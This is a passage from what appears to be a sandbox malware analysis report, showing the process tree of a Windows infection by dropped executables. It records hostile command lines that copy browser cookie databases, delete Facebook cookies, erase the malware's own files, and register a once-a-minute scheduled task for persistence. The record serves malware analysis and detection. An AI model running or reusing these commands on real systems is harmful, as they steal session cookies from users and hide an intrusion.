                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks whether UAC is enabled
                                                                                  • Drops file in Program Files directory
                                                                                  PID:4128
                                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                  7⤵
                                                                                    PID:4452
                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5348
                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5500
                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4496
                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5580
                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      8⤵
                                                                                        PID:3804
                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                        8⤵
                                                                                          PID:5684
                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          8⤵
                                                                                            PID:5688
                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                            8⤵
                                                                                            • Loads dropped DLL
                                                                                            • Modifies registry class
                                                                                            PID:5484
                                                                                      • C:\Users\Admin\Documents\DIOZcX64gYZ6I6Nx6P8hQp18.exe
                                                                                        "C:\Users\Admin\Documents\DIOZcX64gYZ6I6Nx6P8hQp18.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:1704
                                                                                        • C:\Users\Admin\Documents\DIOZcX64gYZ6I6Nx6P8hQp18.exe
                                                                                          C:\Users\Admin\Documents\DIOZcX64gYZ6I6Nx6P8hQp18.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4772
                                                                                      • C:\Users\Admin\Documents\HV4FSz_EiK8svK1NUC0QMw6l.exe
                                                                                        "C:\Users\Admin\Documents\HV4FSz_EiK8svK1NUC0QMw6l.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1796
                                                                                        • C:\Users\Admin\Documents\HV4FSz_EiK8svK1NUC0QMw6l.exe
                                                                                          "C:\Users\Admin\Documents\HV4FSz_EiK8svK1NUC0QMw6l.exe" -q
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4624
                                                                                      • C:\Users\Admin\Documents\G8E7mCTtxv4SFFcWPpF32Paw.exe
                                                                                        "C:\Users\Admin\Documents\G8E7mCTtxv4SFFcWPpF32Paw.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks BIOS information in registry
                                                                                        • Checks whether UAC is enabled
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        PID:4492
                                                                                      • C:\Users\Admin\Documents\OysDLyrbJUaxkdjLrxCd0TLc.exe
                                                                                        "C:\Users\Admin\Documents\OysDLyrbJUaxkdjLrxCd0TLc.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5064
                                                                                        • C:\Users\Admin\AppData\Roaming\6924968.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\6924968.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4392
                                                                                      • C:\Users\Admin\Documents\Hj6RHJd6psoSCjgmQqGQmWCK.exe
                                                                                        "C:\Users\Admin\Documents\Hj6RHJd6psoSCjgmQqGQmWCK.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:3956
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "Hj6RHJd6psoSCjgmQqGQmWCK.exe" /f & erase "C:\Users\Admin\Documents\Hj6RHJd6psoSCjgmQqGQmWCK.exe" & exit
                                                                                          7⤵
                                                                                            PID:3636
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im "Hj6RHJd6psoSCjgmQqGQmWCK.exe" /f
                                                                                              8⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:4124
                                                                                        • C:\Users\Admin\Documents\rixTEpJfiSU_Ch8JnVfO5yF9.exe
                                                                                          "C:\Users\Admin\Documents\rixTEpJfiSU_Ch8JnVfO5yF9.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4976
                                                                                        • C:\Users\Admin\Documents\Mbf9JQMxvS_9_SAdrvQZIBly.exe
                                                                                          "C:\Users\Admin\Documents\Mbf9JQMxvS_9_SAdrvQZIBly.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:3736
                                                                                          • C:\Users\Admin\Documents\Mbf9JQMxvS_9_SAdrvQZIBly.exe
                                                                                            C:\Users\Admin\Documents\Mbf9JQMxvS_9_SAdrvQZIBly.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:6016
                                                                                        • C:\Users\Admin\Documents\sowKPaEjEvHjPNrxypMGK5QV.exe
                                                                                          "C:\Users\Admin\Documents\sowKPaEjEvHjPNrxypMGK5QV.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • NTFS ADS
                                                                                          PID:1676
                                                                                        • C:\Users\Admin\Documents\P8lR6AkvZR4cuEF1cNBu_hEe.exe
                                                                                          "C:\Users\Admin\Documents\P8lR6AkvZR4cuEF1cNBu_hEe.exe"
                                                                                          6⤵
                                                                                            PID:4404
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-OQAA0.tmp\P8lR6AkvZR4cuEF1cNBu_hEe.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-OQAA0.tmp\P8lR6AkvZR4cuEF1cNBu_hEe.tmp" /SL5="$501CC,138429,56832,C:\Users\Admin\Documents\P8lR6AkvZR4cuEF1cNBu_hEe.exe"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              PID:2128
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-JDJOU.tmp\Setup.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-JDJOU.tmp\Setup.exe" /Verysilent
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Program Files directory
                                                                                                PID:5708
                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                  9⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Enumerates connected drives
                                                                                                  • Modifies system certificate store
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  PID:6004
                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628034545 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                    10⤵
                                                                                                      PID:1652
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                    9⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5996
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-LGKC4.tmp\GameBoxWin32.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-LGKC4.tmp\GameBoxWin32.tmp" /SL5="$20308,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                      10⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      PID:4176
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-72NGQ.tmp\Daldoula.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-72NGQ.tmp\Daldoula.exe" /S /UID=burnerch2
                                                                                                        11⤵
                                                                                                          PID:5524
                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                            dw20.exe -x -s 1244
                                                                                                            12⤵
                                                                                                              PID:6816
                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                                        9⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:5988
                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                        9⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5980
                                                                                                        • C:\Users\Admin\AppData\Roaming\6342384.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\6342384.exe"
                                                                                                          10⤵
                                                                                                            PID:5920
                                                                                                          • C:\Users\Admin\AppData\Roaming\8043640.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\8043640.exe"
                                                                                                            10⤵
                                                                                                            • Adds Run key to start application
                                                                                                            PID:5904
                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                              11⤵
                                                                                                                PID:2328
                                                                                                            • C:\Users\Admin\AppData\Roaming\8881061.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\8881061.exe"
                                                                                                              10⤵
                                                                                                                PID:6088
                                                                                                              • C:\Users\Admin\AppData\Roaming\5591910.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\5591910.exe"
                                                                                                                10⤵
                                                                                                                  PID:5420
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                                9⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5968
                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                  10⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3376
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                                9⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5960
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  10⤵
                                                                                                                    PID:6072
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    10⤵
                                                                                                                      PID:5672
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      10⤵
                                                                                                                        PID:6340
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        10⤵
                                                                                                                          PID:6480
                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
                                                                                                                        9⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Checks processor information in registry
                                                                                                                        PID:5948
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im GameBox64bit.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                          10⤵
                                                                                                                            PID:6224
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /im GameBox64bit.exe /f
                                                                                                                              11⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:6736
                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                              timeout /t 6
                                                                                                                              11⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:6192
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                4⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:2104
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC997FA64\sonia_6.exe
                                                                                                                  sonia_6.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Adds Run key to start application
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1504
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2704
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2196
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    6⤵
                                                                                                                      PID:5164
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      6⤵
                                                                                                                        PID:3572
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                    4⤵
                                                                                                                      PID:3360
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 532
                                                                                                                      4⤵
                                                                                                                      • Program crash
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:204
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                                                                      4⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:3324
                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                1⤵
                                                                                                                  PID:1152
                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                  1⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  PID:1036
                                                                                                                  • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                    2⤵
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:4812
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                                                                                                                    2⤵
                                                                                                                      PID:4956
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                        3⤵
                                                                                                                        • Creates scheduled task(s)
                                                                                                                        PID:5560
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:1432
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:6904
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:6832
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:6044
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:4092
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:7032
                                                                                                                    • C:\Users\Admin\AppData\Roaming\bbahuvh
                                                                                                                      C:\Users\Admin\AppData\Roaming\bbahuvh
                                                                                                                      2⤵
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:1580
                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll",hdvAaRs
                                                                                                                      2⤵
                                                                                                                      • Windows security modification
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:2208
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:4960
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:6580
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:4300
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:6544
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:2316
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:4584
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:7012
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:3188
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:3964
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:5956
                                                                                                                    • C:\Users\Admin\AppData\Roaming\bbahuvh
                                                                                                                      C:\Users\Admin\AppData\Roaming\bbahuvh
                                                                                                                      2⤵
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:4456
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
